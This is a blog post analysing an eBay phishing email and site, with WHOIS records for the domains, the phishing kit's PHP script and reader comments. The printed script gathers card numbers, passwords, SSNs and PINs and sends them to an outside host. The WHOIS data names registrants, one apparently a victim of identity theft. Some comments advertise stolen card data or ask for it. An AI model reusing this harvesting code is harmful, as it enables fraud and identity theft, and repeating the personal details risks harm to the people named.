Looks like EBay, but smells like Phish
About once a week I get one of those stupid EBay account verification email messages that sends me to non-EBay sites and asks me for information that can be used to steal my identity or at least my money. This morning another one arrived, but this time I think the phisher made a mistake …
This is the email that I found in my inbox this morning:
Looks like EBay, but smells like Phish!
As you guessed correctly the purple link in this email does not bring you to an ebay-web site, but instead it sends you straight to the phisher where he asks for everything you’re ready to release: Credit Card information, EBay userid and password, Social Security Number, etc. The web form that asks all those questions is hosted at “http://ebay-customer-validate.info/”.
This is the first part of the web form you’re supposed to fill in:
According to the WHOIS system, this is pretty new domain (1 month old) which has been created with a lot of phony information:
Update 03/10/2005: The personal information about the registrant has been removed per request
Domain ID:D5916187-LRMS
Domain Name:EBAY-CUSTOMER-VALIDATE.INFO
Created On:10-May-2004 02:20:06 UTC
Last Updated On:10-Jun-2004 04:08:01 UTC
Expiration Date:10-May-2005 02:20:06 UTC
Sponsoring Registrar:R191-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C4692873-LRMS
Registrant Name:MIKE LYNN
Registrant Organization:MIKE LYNN
Registrant Street1:—- ———
Registrant City:—–
Registrant State/Province:—–
Registrant Postal Code:—–
Registrant Country:US
Registrant Phone:—————
Registrant FAX:—————
Registrant Email:226cb677843604edbf781c459ac930d4-844435@owner.gandi.net
Admin ID:C4692872-LRMS
Admin Name:MIKE LYNN
Admin Street1:—- ——–
Admin City:—–
Admin State/Province:—–
Admin Postal Code:——
Admin Country:US
Admin Phone:————–
Admin Email:6754fd5d747bbc58b2da0022f2b7b3fb-ml1287@contact.gandi.net
Billing ID:C1249598-LRMS
Billing Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
Billing Organization:GANDI sarl
Billing Street1:see also whois.gandi.net
Billing City:Paris
Billing Postal Code:F-75003
Billing Country:FR
Billing Email:support@gandi.net
Tech ID:C4692872-LRMS
Tech Name:MIKE LYNN
Tech Street1:—- ———
Tech City:—–
Tech State/Province:—–
Tech Postal Code:——
Tech Country:US
Tech Phone:————-
Tech Email:6754fd5d747bbc58b2da0022f2b7b3fb-ml1287@contact.gandi.net
Name Server:NS4.WORLDISPNETWORK.COM
Name Server:NS3.WORLDISPNETWORK.COM
Looking at the current IP address of “ebay-customer-validate.info” (66.160.143.112) I can tell that it is some random host inside “Hurricane Electric”:
Hurricane Electric HURRICANE-7 (NET-66-160-128-0-1)
66.160.128.0 - 66.160.207.255
Host Department, LLC. HURRICANE-CE1412-438 (NET-66-160-143-0-1)
66.160.143.0 - 66.160.143.255# ARIN WHOIS database, last updated 2004-06-09 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.
While looking at the HTML-code for this phishing page, I can see that once you’ve filled in the form, the data should be processed with a PHP script called set.php. Just hitting the “Submit” button without actually filling in any information brings up a Javascript alert that tells you to fill in the blank fields.
The HTML-code also shows that the data should be POSTed to the PHP script (vs. the GET HTTP method). So I decided to just invoke the set.php script via GET instead of POST. Instead of executing the script, I get the source code of the script. Looks like the person who setup the phishing web site was stupid enough to only wire the POST method to the execution of the script.
The script is pretty straight forward and here are the most interestig PHP lines:
$ok=1;$av = array (”user”,”pass”,”email”,”ccnumber”,”month”,”day”,”year”,”cvv”,”ccholder”,”address”,”address2″,”dayphone1″,
“dayphone2″,”dayphone3″,”dayphone4″,”cityaddr”,”stateprovaddr”,”zipcodeaddr”,”countryaddr”,”firstname”,
“middlename”,”lastname”,”bankcountry”,”bankname”,”bankroutingnumber”,”bankaccountnumber”,
“bankaccountnumber2″,”ssn1″,”ssn2″,”ssn3″,”pin”,”mmn”,”birthdatemm”,”birthdatedd”,”birthdateyy”,”dlnumber”,
“dlstate”,”set”);for ($j=0; $j<count($av); $j++) {
$temp=$av[$j];
del($$temp);
}if (!eregi(”^[a-z0-9\._-]+@[a-z0-9\._-]+\.[a-z]{2,4}\$”, $email)) $email=”";
if (strlen($pin)<4) $ok=0;
if (strlen($ccnumber)<4) $ok=0;
if ($email==”" OR $pass==”" OR $user==”" OR $month==”" OR $day==”" OR $year==”" OR $pin==”" OR $ccnumber==”" ) $ok=0;
if ($set==1 AND $ok==1)
{$text=”cc# : $ccnumber $month $year PIN: $pin
Ebay User ID: $user
Password: $pass
Email Address: $email
Expiration date: $month / $day / $year
CVV Code: $cvv
Your name on card: $ccholder
Billing address: $address
- $address2
Primary telephone: ($dayphone1) $dayphone2
Secondary telephone: ($dayphone3) $dayphone4
City: $cityaddr
State/province: $stateprovaddr
Zip/postal code: $zipcodeaddr
Country: $countryaddr
Social Security Number: $ssn1 $ssn2 $ssn3
Card PIN Number: $pin
Mother’s Maiden Name: $mmn
Date Of Birth: $birthdatemm $birthdatedd $birthdateyy=============================
“;
$fp = @fopen(”http://informationlevelone.biz/got.php?ipz=”.urlencode($text), ‘rb’);
fflush($fp);
fclose($fp);
}
This piece of code basically verifies that you’ve really filled in all the form information and only if ‘$ok’ has the value of ‘1′ after the verification (and a form variable called ’set’ is also set to ‘1′), it will execute a portion of the script, that forwards all the information to another web-site.
In this case the other web site is “http://informationlevelone.biz/” where it tries to pass the information to another PHP script called “got.php”.
Well, so who is “informationlevelone.biz” - let’s take a look at the WHOIS record:
Domain Name: INFORMATIONLEVELONE.BIZ
Domain ID: D7117735-BIZ
Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Status: ok
Registrant ID: OLNIC_706285_0_0
Registrant Name: Vahtang Ahmadulin
Registrant Organization: Vahtang Ahmadulin
Registrant Address1: 3524 west shore rd.
Registrant City: Warwick
Registrant State/Province: na
Registrant Postal Code: 3524
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.2054060100
Registrant Facsimile Number: +1.2054060100
Registrant Email: noc@sweb.ru
Administrative Contact ID: OLNIC_706285_1_0
Administrative Contact Name: Vahtang Ahmadulin
Administrative Contact Organization: Vahtang Ahmadulin
Administrative Contact Address1: 3524 west shore rd.
Administrative Contact City: Warwick
Administrative Contact State/Province: na
Administrative Contact Postal Code: 3524
Administrative Contact Country: United States
Administrative Contact Country Code: US
Administrative Contact Phone Number: +1.2054060100
Administrative Contact Facsimile Number: +1.2054060100
Administrative Contact Email: noc@sweb.ru
Billing Contact ID: OLNIC_706285_3_0
Billing Contact Name: Vahtang Ahmadulin
Billing Contact Organization: Vahtang Ahmadulin
Billing Contact Address1: 3524 west shore rd.
Billing Contact City: Warwick
Billing Contact State/Province: na
Billing Contact Postal Code: 3524
Billing Contact Country: United States
Billing Contact Country Code: US
Billing Contact Phone Number: +1.2054060100
Billing Contact Facsimile Number: +1.2054060100
Billing Contact Email: noc@sweb.ru
Technical Contact ID: OLNIC_706285_2_0
Technical Contact Name: Vahtang Ahmadulin
Technical Contact Organization: Vahtang Ahmadulin
Technical Contact Address1: 3524 west shore rd.
Technical Contact City: Warwick
Technical Contact State/Province: na
Technical Contact Postal Code: 3524
Technical Contact Country: United States
Technical Contact Country Code: US
Technical Contact Phone Number: +1.2054060100
Technical Contact Facsimile Number: +1.2054060100
Technical Contact Email: noc@sweb.ru
Name Server: NS2.SPACEWEB.RU
Name Server: NS1.SPACEWEB.RU
Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
Domain Registration Date: Tue Jun 08 13:45:57 GMT 2004
Domain Expiration Date: Tue Jun 07 23:59:59 GMT 2005
Registrar is “China-Channel.com” which most certainly means that all the information provided in the registration database is fake. Name-servers in Russia? That does not look good.
When contacting the server via a web browser using the URL “http://informationlevelone.biz/” one is immediately redirected to “http://www.sweb.ru/”, a web hosting provider in St. Petersburg. This is also verified via the reverse WHOIS lookup on the IP address of informationlevelone.biz (81.222.134.16):
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NLReferralServer: whois://whois.ripe.net:43
NetRange: 81.0.0.0 - 81.255.255.255
CIDR: 81.0.0.0/8
NetName: 81-RIPE
NetHandle: NET-81-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate:
Updated: 2004-03-16# ARIN WHOIS database, last updated 2004-06-09 19:10
# Enter ? for additional hints on searching ARIN’s WHOIS database.
% This is the RIPE Whois server.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.htmlinetnum: 81.222.134.0 - 81.222.135.255
netname: SpaceWeb
descr: PROVIDER
country: RU
admin-c: KAPY-RIPE
tech-c: KAPY-RIPE
status: ASSIGNED PA
notify: abuse@sweb.ru
mnt-by: ELTEL-RIPE-MNT
changed: registry@eltel.net 20040317
source: RIPEroute: 81.222.128.0/20
descr: ELTEL.net
origin: AS20597
mnt-by: ELTEL-RIPE-MNT
changed: registry@eltel.net 20021204
source: RIPEperson: Nikita V Kapitansky
address: 53A, 2-nd Line,
address: Vasilievsky Island
address: St-Petersburg, 199004, Russia
e-mail: manager@sweb.ru
phone: +7 812 3271923
fax-no: +7 812 3271923
notify: manager@sweb.ru
nic-hdl: KAPY-RIPE
changed: manager@sweb.ru 20020910
source: RIPE
I’m certain that if we got sweb.ru to reveal the identity of their customer running informationlevelone.biz on their servers we would be a lot closer to one of the most notorious phishers out there. If this is the same person as “yernadop” (who appears yet again in the phishing form) remains to be seen.
Interestingly enough, while I was writing down the information for this posting, the phisher corrected his/her mistake. The set.php script above cannot be looked at any more. But I guess it was still too late for the change!
And even more interesting: Here I sit on some concrete information about a phisher, with details where one has to set the thumb screws and I have no way of telling eBay about it. All they offer is a place where one can forward spoofed email to (spoof@ebay.com), but where do I send this information? Begs the question, whether they are really interested to stop phishers from ripping off their users.
Gawd–Your sleuthing is so interesting. I just got a bum email “from” Citibank, stating that my “wire transfer” was completed and that if I had any questions to log into their website via the provided link which asked for account information. Of course I realized it was a phony email fishing for information and that the link sent me to an unsecure site. I sent the info (i.e. link) to Citibank and within 1-day the link was rendered invalid. Don’t know what happened behind the scenes, but it is easy to see how an unknowing individual can be fooled!
I’m a writer for a biz mag. Looking to get examples of how easy it is to phish for a story…
Any ideas?
I got almost the same ebay verification mail redirecting to http://www.ebay-customer-validate.info/index.html
Why ebay did not do anything with this??? It is already September 2004. It looks like it worked for 3 months, right?
Quote: “Why ebay did not do anything with this??? ”
You want to get Ebay’s attention?
That’s easy - do what I just did, send SpamCop reports in response to every e-bay phish.
E-bay will then be contacted because their websites / e-mail addiesses are referenced in the spam (and make no mistake about it, this IS spam!)
Please take down my personal information.
#1 - I didn’t buy that domain - my someone used my information to buy it. But I did get a bunch of hate phone calls to my home. I figured out what happened when I got the email myself and look it up.
#2 - why would a spammer buy a domain with valid info to do illegal things?
#3- I tried to contact ebay about it - they never responded.
#4 I also reported the identity theft to the FTC - nothing….
Did you ever get ahold of RIPE NETWORKS? because at the moment my counter strike source dedicated server is getting knocked offline from 2 (195.156.109.234 & 81.48.195.17) of the IP addresses allocated to ripe networks and I would like to know how to go about resolving this issue. MY isp SAYS THEY CANT DO NOTHING ABOUT IT!
I am l33t h4×0r although I have cvv2 suppliers
it’s kid stuff to get cvv2s making simple scam you trade page get php host upload and spam mail lists that you trade as well 
if you wanna become l33t h4×0r thou you g2 mail me since I can do EVERYTHING
is my mail
datacore@mail.bg
hello,
i need an information on Billing address; Phone number; E-mail address; Credit card number, expiry date, CVV/CVC number and PIN; Social Security number; Mothers maiden name; Date of birth
Pls i need a credit card to pay for some sites .
thanks.
bharyor